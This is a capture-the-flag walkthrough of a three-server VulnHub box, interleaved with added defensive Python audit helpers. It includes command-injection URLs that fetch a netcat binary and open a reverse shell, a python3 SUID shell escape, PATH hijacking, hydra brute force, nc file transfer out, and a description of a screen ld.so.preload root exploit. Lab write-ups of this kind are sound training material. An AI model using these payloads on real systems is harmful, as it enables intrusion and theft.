
0. Preface

This box is pretty long, but relatively easy (YMMV). This just requires some enumeration and knowing what to exploit. GTFOBins is really your best friend in this box. Having knowledge of how SSH tunneling works is helpful too.

tmux makes this box a lot less of a headache.

In this box, we will be tackling:

  1. Exploiting sudo privileges on the MailServer.
  2. Pwning the MailServer using zip.
  3. Pivoting to and exploiting the WebServer using unsanitised PHP code.
  4. Escalating privileges on the WebServer using python3.
  5. Pwning the WebServer with PATH hijacking.
  6. Pwning the DatabaseServer using screen.

1. Preliminary NMAP Scan

sudo nmap -sC -sV -oN nmap.txt 192.168.32.15 -v

[screenshot]

[screenshot]

There are plenty of open ports here - 80, 2222 (SSH), 110, 8000 and 9000. Let’s check out the web server on port 80 first.

2. The Task

[screenshot]

So, we can’t attack ports 8000, 9000 and this page. This leaves us with only ports 2222 and 110. Apparently we also have mail on port 110, so let’s check that out.

telnet 192.168.32.15 110

USER pentester
PASS qKnGByeaeQJWTjj2efHxst7Hu0xHADGO
LIST

[screenshot]

There’s only one message. We can use RETR 1 to read it.

[screenshot]

Let’s try to guess the username for this server administrator. The following is the list that we come up with.

[screenshot]

Now, let’s try to brute-force the POP3 login with hydra, taking into consideration the following hint on the VulnHub description for the box.

[screenshot]

grep bobby /usr/share/wordlists/rockyou.txt > ./wordlist.txt
hydra -L pop3_usernames.txt -P ./wordlist.txt pop3://192.168.32.15

[screenshot]

Sweet, we have our first set of credentials - bob:bobby1985.

3. Exploiting Sudo Privileges on MailServer

Let’s see if bob has any mail.

telnet 192.168.32.15 110

USER bob
PASS bobby1985
LIST

[screenshot]

Doesn’t seem to have any, so let’s try to SSH to the box as bob.

[screenshot]

Seems like we’re in the MailServer. Let’s start off with enumeration.

[screenshot]

Looking at sudo -l, we see that bob is able to run a script in /opt/scripts/check.sh as my2user. Let’s check out /etc/passwd next.

[screenshot]

There’s nothing we don’t already know in here, so let’s take a look at the script at /opt/scripts/check.sh.

[screenshot]

The script can be edited by bob, so let’s just add /bin/bash to the script and run it using sudo to move to my2user.

[screenshot]

sudo -u my2user /bin/bash /opt/scripts/check.sh

[screenshot]

4. Pwning the MailServer with sudo Rights on Zip

Again, looking at sudo -l for my2user, we see that it is able to run /usr/bin/zip as root.

[screenshot]
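Both MailServer footholds came out of `sudo -l`: a script that bob could edit (section 3) and a binary, zip, that can spawn a shell once it runs as root (this section). The following is an added audit helper written for this write-up, not code from the box or from GTFOBins; it takes the target paths that `sudo -l` lists and reports the ones a non-root user could tamper with, plus the ones whose name appears in a small, assumed list of binaries with documented shell escapes (the page only uses zip, python3 and screen; the other names are examples).

```python
import os
import stat
import tempfile
from typing import Dict, List

# Constructed audit helper (not part of the original write-up). Two things made the
# MailServer fall: a sudo target that bob could edit, and a sudo target (zip) that
# can spawn a shell. Both are things a defender can check from `sudo -l` output.

# Binaries with well-documented shell escapes (GTFOBins). zip, python3 and screen
# appear on the page; the remaining names are assumed examples.
SHELL_ESCAPE_BINARIES = {"zip", "python3", "screen", "vim", "less", "find", "awk"}

def writable_reasons(mode: int, uid: int, gid: int, root_gids=(0,)) -> List[str]:
    """Explain why a file with this owner/mode could be altered by a non-root user."""
    reasons = []
    if uid != 0:
        reasons.append(f"owned by uid {uid} rather than root")
    if mode & stat.S_IWGRP and gid not in root_gids:
        reasons.append(f"writable by group gid {gid}")
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons

def dir_replace_reasons(mode: int, uid: int, gid: int) -> List[str]:
    """A writable parent directory lets the target be renamed away and replaced."""
    reasons = writable_reasons(mode, uid, gid)
    if mode & stat.S_ISVTX:
        # sticky bit: other users cannot unlink or rename entries, but the owner still can
        reasons = [r for r in reasons if r.startswith("owned by")]
    return [f"parent directory {r}" for r in reasons]

def audit_sudo_targets(paths: List[str]) -> Dict[str, List[str]]:
    """Map each sudo target to the reasons it is risky (an empty list means nothing found)."""
    report = {}
    for path in paths:
        reasons = []
        if os.path.basename(path) in SHELL_ESCAPE_BINARIES:
            reasons.append("binary has a documented shell escape; sudo to it is a root shell")
        try:
            st = os.stat(path)
            reasons += writable_reasons(st.st_mode, st.st_uid, st.st_gid)
        except FileNotFoundError:
            reasons.append("target does not exist, so whoever can create it controls it")
        parent = os.path.dirname(path) or "/"
        try:
            pst = os.stat(parent)
            reasons += dir_replace_reasons(pst.st_mode, pst.st_uid, pst.st_gid)
        except FileNotFoundError:
            reasons.append("parent directory missing")
        report[path] = reasons
    return report

def demo() -> Dict[str, List[str]]:
    """Constructed fixture: a world-writable script and a 0755 one in a temp dir."""
    base = tempfile.mkdtemp()
    loose = os.path.join(base, "check.sh")
    tight = os.path.join(base, "locked.sh")
    for p in (loose, tight):
        with open(p, "w") as fh:
            fh.write("#!/bin/bash\necho ok\n")
    os.chmod(loose, 0o777)   # like /opt/scripts/check.sh above: anyone may append to it
    os.chmod(tight, 0o755)
    os.chmod(base, 0o755)
    return audit_sudo_targets([loose, tight])

if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, "->", reasons or ["nothing found"])
```

Running the script as a normal user also flags files that user owns, which is the point: a sudo rule is only as strong as the least-privileged account that can edit its target or its parent directory.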

Before we move on, generate a key using ssh-keygen on our local machine and upload it so we can access my2user easily.

[screenshot]

[screenshot]

Let’s login again with the new key.

[screenshot]

Going back to the zip binary, let’s take a look at GTFOBins to see what we might be able to exploit.

[screenshot]

Great, we have a privilege escalation path. Let’s do that.

[screenshot]

Nice, let’s upload the same SSH key we used for my2user so we can easily access root too. Again, re-login to the mail server as root.

[screenshot]

Let’s grab the flag.

[screenshot]

Next stop, WebServer.

5. Pivoting to Web Server and Exploiting Unsanitised PHP Code

First, let’s take a look at ifconfig.

[screenshot]

We will need to find out if there are other IP addresses in this subnet, so let’s upload netdiscover from our local box. We can use netdiscover to scan the subnet 172.17.0.0/16 on eth0. We know that it is a /16 subnet because of the subnet mask of 255.255.0.0.

./netdiscover -i eth0 -r 172.17.0.0/16

[screenshot]

Let’s also take a look at the routing table to figure out which one is the gateway.

route -n

[screenshot]

This means we can ignore 172.17.0.1 and focus on the others - 172.17.0.2, 172.17.0.3 and 172.17.0.4. Now, we will upload and use nc to do port discovery for the other three hosts.

./nc -znv 172.17.0.2 1-1023
./nc -znv 172.17.0.3 1-1023
./nc -znv 172.17.0.4 1-1023

[screenshot]

172.17.0.2 does not seem to have any common open ports. It also seems like the web server is located at 172.17.0.3, due to the open port 80.

172.17.0.4 also has ftp open. Let’s first check that out to see if we can access it anonymously.

[screenshot]

We can, and there’s just an empty file at /pub/test. Moving on, let’s try to access the web server using curl on the MailServer.

[screenshot]

Good, now we need a way to forward a port from our machine to this host so that we can run gobuster against it. We can do so using SSH local port forwarding. The command below forwards port 8000 on our local machine to the WebServer’s port 80, via the MailServer.

ssh -L 8000:172.17.0.3:80 root@192.168.32.15 -p 2222 -i keys/id_rsa
curl localhost:8000

[screenshot]

gobuster dir -u http://localhost:8000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o scans/gobuster-webserver.txt

[screenshot]

Let’s visit /ping in our web browser using http://localhost:8000/ping.

[screenshot]

Let’s start off by checking out For-Oscar.txt.

[screenshot]

Nothing much here, so let’s check out ping.php next.

[screenshot]

Interesting. Let’s try appending ?host=172.17.0.5.

[screenshot]

Seems like it’s passing the host parameter straight into a ping command via PHP, then putting each output line into an array and displaying it. Since the parameter is never sanitised, let’s try to execute other commands with this by appending ?host=; whoami instead.

[screenshot]
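For the defender's side of the ping.php bug, here is an added example (mine, not the box's PHP) of how the same feature looks when the host parameter is validated and ping is invoked with an argument list instead of a shell. It is written in Python rather than PHP so it can be run stand-alone; the function names are my own.

```python
import ipaddress
import re
import subprocess
from typing import List, Optional

# Constructed example: ping.php above hands the raw `host` parameter to a shell,
# so "; whoami" becomes a second command. The safe pattern is (1) accept only
# something that is syntactically a host and (2) run ping with argv, shell=False.

# RFC 1123 style hostname: labels of 1-63 alnum/hyphen chars, no leading/trailing hyphen.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

def validate_host(value: str) -> Optional[str]:
    """Return the host if it is a valid IP address or hostname, otherwise None."""
    value = value.strip()
    try:
        return str(ipaddress.ip_address(value))   # 172.17.0.5, ::1, ...
    except ValueError:
        pass
    if _HOSTNAME_RE.match(value):
        return value.lower()
    return None   # ';', '|', whitespace, '$(', backticks all fail both checks

def build_ping_argv(host: str, count: int = 3) -> List[str]:
    """Build ping's argv. No shell is involved, so metacharacters cannot chain commands.
    Neither a valid IP nor a valid hostname can start with '-', so option injection is out too."""
    clean = validate_host(host)
    if clean is None:
        raise ValueError(f"rejected host parameter: {host!r}")
    return ["ping", "-c", str(count), clean]

def run_ping(host: str) -> List[str]:
    """Run ping with list arguments and return its output lines, like the PHP array."""
    result = subprocess.run(build_ping_argv(host), capture_output=True, text=True, timeout=30)
    return result.stdout.splitlines()

if __name__ == "__main__":
    for candidate in ("172.17.0.5", "; whoami", "$(id)", "-c"):
        print(repr(candidate), "->", build_ping_argv(candidate) if validate_host(candidate) else "rejected")
```

The allow-list check does the heavy lifting; `escapeshellarg()` on the PHP side would stop the command chaining but would still let a caller pass arbitrary strings to ping, which is why validating the value as a host first is the better habit.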

Awesome, we have RCE. Let’s upload an nc binary from our machine to the MailServer, then from the MailServer to the WebServer. We will also make the binary executable using chmod 777.

I realised after pwning the WebServer that I didn’t have to transfer nc through the MailServer. All the servers can reach my local machine.

http://localhost:8000/ping/ping.php?host=; wget http://172.17.0.5:9000/nc
http://localhost:8000/ping/ping.php?host=; chmod 777 nc
http://localhost:8000/ping/ping.php?host=; ls -la nc; pwd

[screenshot]

[screenshot]

Great, now we can get a bash reverse shell from the WebServer back to the MailServer.

http://localhost:8000/ping/ping.php?host=; /var/www/html/ping/nc 172.17.0.5 9000 -e /bin/bash

[screenshot]

Let’s enumerate a bit using this.

[screenshot]

There are two users in /etc/passwd that we can potentially move to. Let’s see what files each of them own.

[screenshot]

We find a file in /var/backups/.secret owned by oliver.

[screenshot]

Now we have our second set of credentials - oliver:4hppfvhb9pW4E4OrbMLwPETRgVo2KyyDTqGF. Let’s ssh to the web server as oliver from the MailServer.

[screenshot]

6. Pwning WebServer with Python3 and PATH Hijacking

Let’s start off by uploading and running linpeas.sh.

[screenshot]

Under the SUID section, we see that python3 has the SUID bit set. Let’s check out who owns the binary.

[screenshot]

Good, we should be able to move to oscar using this binary. Again, thanks to GTFOBins, we can run the following command to move to oscar.

python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

[screenshot]

[screenshot]

Conveniently, there’s a password for oscar right in his home directory. We now have our third set of credentials - oscar:H53QfJcXNcur9xFGND3bkPlVlMYUrPyBp76o. Let’s login again to the WebServer over SSH.

[screenshot]

Let’s look around a bit.

[screenshot]

We find a binary in /home/oscar/scripts called current-date, which is owned by root and has the SUID bit set. Let’s see what this binary is running using strings.

[screenshot]

Looks like it’s trying to run date by name rather than by absolute path, so it is resolved through whatever PATH the caller supplies. We can exploit that by prepending /home/oscar to the PATH variable, then creating a date script in that directory that calls /bin/bash.

export PATH=/home/oscar:$PATH

[screenshot]

[screenshot]

Next stop, DatabaseServer.

7. Pwning the Database Server using Screen

Recall that FTP server on 172.17.0.4 from earlier? That should most likely be the database server. Let’s dig a bit deeper than we did the first time.

[screenshot]

There’s a hidden .folder we missed earlier.

[screenshot]

Let’s download .backup.zip and see what we can get from it.

[screenshot]

[screenshot]

Turns out we need a password. Let’s download the zip file back to our local machine, then extract the password hash with zip2john, then crack it with john. We can use nc to transfer the file.

# Local machine: start the listener first so the sender has something to connect to
nc -lvnp 8000 > backup.zip

# Remote server (DatabaseServer): push the file to the listener
nc -w 3 192.168.32.4 8000 < backup.zip

[screenshot]

zip2john backup.zip > backup.hash
sudo john --wordlist:/usr/share/wordlists/rockyou.txt backup.hash

[screenshot]

Nice, let’s extract and read creds.txt.

[screenshot]

We now have our fourth set of credentials - donald:HBRLoCZ0b9NEgh8vsECS. Let’s use SSH to login to the server via the MailServer.

[screenshot]

Again, we will upload and run linpeas.sh.

[screenshot]

Immediately, we see that screen-4.5.0 is most likely a privilege escalation vector. Let’s see what GTFOBins has to say about that one.

[screenshot]

We can apparently write files as a privileged user. After Googling a bit, we find an exploit that can allow us to escalate privileges to root using screen by overwriting /etc/ld.so.preload.

The dynamic loader loads every library listed in /etc/ld.so.preload before any other shared library, for every dynamically linked program it starts. This exploit makes use of the fact that screen is able to write files as root, and hence is able to overwrite /etc/ld.so.preload.

First, the script creates a libhax.so “library” in /tmp, which changes the owner of /tmp/rootshell to root, and sets the SUID bit. This also deletes the existing /etc/ld.so.preload file.

[screenshot]

Next, the script creates the /tmp/rootshell binary which executes /bin/sh.

[screenshot]

Finally, the script uses screen to write to /etc/ld.so.preload to get it to execute /tmp/libhax.so, then run screen -ls to trigger the “library” (which runs chmod & chown on /tmp/rootshell), then executes /tmp/rootshell.

[screenshot]
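Because the loader honours /etc/ld.so.preload for every process, the file is worth auditing on any host that has a SUID screen or similar. Here is an added checker (my code, not the exploit script and not part of the write-up) that reads the preload list the way glibc does, whitespace- or colon-separated entries with `#` comments, and reports entries that are not root-owned, are writable by others, or live in a scratch directory such as /tmp. The `lookup` callback is injectable so the parsing can be exercised against constructed stat data; the scratch-directory list is an assumption.

```python
import os
import stat
from typing import Callable, List, NamedTuple

# Constructed audit helper (not part of the original write-up or the exploit it
# describes). The loader honours every entry of /etc/ld.so.preload for every
# dynamically linked program, so a defender checks that the file and each listed
# library are root-owned, not writable by others, and not in a scratch directory.

SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm", "/home")   # assumed user-writable roots

class FileInfo(NamedTuple):
    exists: bool
    uid: int = 0
    mode: int = 0o644

def _perm_issues(label: str, info: FileInfo) -> List[str]:
    """Ownership and permission checks shared by the preload file and its entries."""
    if not info.exists:
        return [f"{label}: does not exist"]
    issues = []
    if info.uid != 0:
        issues.append(f"{label}: owned by uid {info.uid}, not root")
    if info.mode & (stat.S_IWGRP | stat.S_IWOTH):
        issues.append(f"{label}: writable by group or others")
    return issues

def audit_preload(content: str, lookup: Callable[[str], FileInfo],
                  preload_info: FileInfo = FileInfo(True)) -> List[str]:
    """Return findings for preload-file text; lookup supplies FileInfo for each listed path."""
    issues = _perm_issues("/etc/ld.so.preload", preload_info)
    for raw in content.splitlines():
        line = raw.split("#", 1)[0]                      # '#' starts a comment
        for entry in line.replace(":", " ").split():     # entries split on whitespace or ':'
            if not entry.startswith("/"):
                issues.append(f"{entry}: relative path in preload list")
                continue
            if any(entry == d or entry.startswith(d + "/") for d in SCRATCH_DIRS):
                issues.append(f"{entry}: library lives in a user-writable scratch directory")
            issues += _perm_issues(entry, lookup(entry))
    return issues

def stat_lookup(path: str) -> FileInfo:
    """Real filesystem lookup for audit_preload."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return FileInfo(False)
    return FileInfo(True, st.st_uid, st.st_mode)

def audit_system(preload_path: str = "/etc/ld.so.preload") -> List[str]:
    """Audit the live preload file; on a clean host the file normally does not exist at all."""
    info = stat_lookup(preload_path)
    if not info.exists:
        return []
    with open(preload_path) as fh:
        return audit_preload(fh.read(), stat_lookup, info)

if __name__ == "__main__":
    for issue in audit_system() or ["/etc/ld.so.preload: absent or clean"]:
        print(issue)
```

An empty result from `audit_system()` is the expected state on most systems; the moment the file appears, or points into /tmp, something has gone wrong. The actual fix for this box is still to update screen, since the root cause is the SUID binary writing files as root, not the preload mechanism itself.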

With the explanation out of the way, let’s copy the script into a file and run it.

[screenshot]

[screenshot]

And we’re done.